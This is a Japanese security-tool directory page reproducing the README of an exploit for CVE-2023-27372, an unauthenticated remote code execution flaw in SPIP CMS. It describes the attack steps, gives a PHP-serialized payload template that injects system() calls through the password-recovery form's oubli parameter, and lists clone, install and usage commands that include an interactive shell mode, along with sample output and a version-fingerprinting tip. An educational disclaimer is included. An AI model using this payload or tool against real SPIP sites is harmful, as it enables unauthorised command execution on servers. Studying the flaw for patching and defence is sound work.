Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2023-27372 — CVE-2023-27372 用のインタラクティブシェルを備えたエクスプロイト | Kitploit
ツール/GitHubGitHub/scriniariii/cve-2023-27372
脆弱性分析コード分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubscriniariii/cve-2023-27372

CVE-2023-27372

CVE-2023-27372 用のインタラクティブシェルを備えたエクスプロイト

リポジトリを見る
15ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2023-27372 エクスプロイト

CVE-2023-27372 のエクスプロイト - SPIP CMS のバージョン 4.2.1 より前のバージョンに影響する認証なしのリモートコード実行脆弱性です。

⚠️ 教育目的のみです。 自分が所有しているシステム、または明示的な書面による許可を得たシステムでのみ使用してください。不正使用は違法です。


概要

SPIP は Web 公開に広く使用されているオープンソース CMS です。この脆弱性はパスワード回復フォーム (/spip.php?page=spip_pass) に存在し、oubli パラメータが適切なサニタイズなしで処理されるため、攻撃者はサーバー上で任意の PHP コードを注入して実行できます — 認証は不要です。

フィールド詳細
CVECVE-2023-27372
CVSS スコア9.8 (Critical)
攻撃ベクトルネットワーク
認証不要
影響を受けるバージョンSPIP < 4.2.1
脆弱性タイプコードインジェクション / 未認証の RCE

仕組み

  1. CSRF トークンの取得 — GET リクエストを /spip.php?page=spip_pass に送信し、HTML フォームから formulaire_action_args トークンを抽出します。

  2. ペイロードの構築 — 実行するコマンドを含む PHP シリアル化文字列を作成します:

    root@kitploit:~
    s:N:"<?php system('COMMAND'); ?>";
    

    ここで N は内部の PHP 文字列の正確なバイト長です。

  3. ペイロードの送信 — 細工されたペイロードを oubli フィールドに含め、CSRF トークンとともに POST リクエストを送信します。SPIP はこのフィールドをサニタイズせずに処理し、注入された PHP コードを実行します。

  4. 出力の抽出 — コマンドの出力は HTML レスポンス内に返され、oubli 入力フィールドの value 属性から解析されます。

必要条件

  • Python 3.x
  • requests
  • beautifulsoup4
  • argparse
  • regex

インストール

root@kitploit:~

git clone https://github.com/scriniarii/CVE-2023-27372

cd CVE-2023-27372

pip install requests beautifulsoup4

使用方法

root@kitploit:~
python3 exploit.py -u <URL> -c <command>
引数説明
-u, --urlターゲット SPIP インスタンスのベース URL
-c, --commandターゲットで実行する OS コマンド
-s, --shellインタラクティブシェル

例

root@kitploit:~

python3 exploit.py -u http://TARGET/ -c "id"
root@kitploit:~

python3 exploit.py -u http://TARGET/ -s

期待される出力:

root@kitploit:~
[+] Token found : JWDCxt5PTFzhPb...

[+] Output:
uid=33(www-data) gid=33(www-data) groups=33(www-data)

影響を受けるバージョン

ターゲットの SPIP バージョンを確認するには、HTML 内の meta generator タグを探します:

root@kitploit:~
<meta name="generator" content="SPIP 4.2.0" />

[!CAUTION]
⚠️ Disclaimer
私のリポジトリで提供される情報やエクスプロイトは、教育目的および責任ある開示のためにのみ使用してください。これらのツール、スクリプト、エクスプロイトの使用によって生じた誤用や損害について、私は一切の責任を負いません。

ツールをダウンロード